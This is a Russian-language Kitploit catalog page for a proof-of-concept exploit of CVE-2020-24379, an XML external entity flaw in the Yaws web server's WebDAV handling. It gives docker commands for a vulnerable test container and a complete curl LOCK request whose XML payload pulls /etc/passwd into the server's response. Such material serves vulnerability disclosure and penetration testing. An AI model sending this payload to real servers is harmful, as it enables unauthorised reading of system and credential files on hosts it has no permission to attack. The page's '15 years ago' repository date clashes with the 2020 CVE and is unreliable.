Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
poc-yaws-dav-xxe — POC внедрения внешних XML-сущностей в веб-сервере Yaws | Kitploit
Инструменты/GitHubGitHub/vulnbe/poc-yaws-dav-xxe
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubvulnbe/poc-yaws-dav-xxe

poc-yaws-dav-xxe

POC внедрения внешних XML-сущностей в веб-сервере Yaws

Репозиторий
15 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

XXE в веб-сервере Yaws (CVE-2020-24379)

Доказательство концепции

Соберите тестовый образ:

docker build -t vulnbe/yaws-pocs:xxe-dav-mod -f Dockerfile .

и/или

Запустите контейнер docker run --rm -d -i -p 127.0.0.1:8000:8080 vulnbe/yaws-pocs:xxe-dav-mod

Затем выполните:

root@kitploit:~
curl -i -s -k -X LOCK http://localhost:8000/ -H 'Timeout: Second-1' \
  --data-binary @- << EOF
<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "file:///etc/passwd">
]>
<d:lockinfo xmlns:d="DAV:">
  <d:lockscope><d:exclusive/></d:lockscope>
  <d:locktype><d:write/></d:locktype>
  <d:owner>
  <d:href><r>&sp;</r></d:href>
  </d:owner>
  </d:lockinfo>
EOF

Автор

Alexey Pronin (@vulnbe)

Ссылки

  • Анализ уязвимости
  • Yaws на GitHub
  • CVE-2020-24379
  • CWE-611: Некорректное ограничение ссылок на внешние сущности XML
Скачать инструмент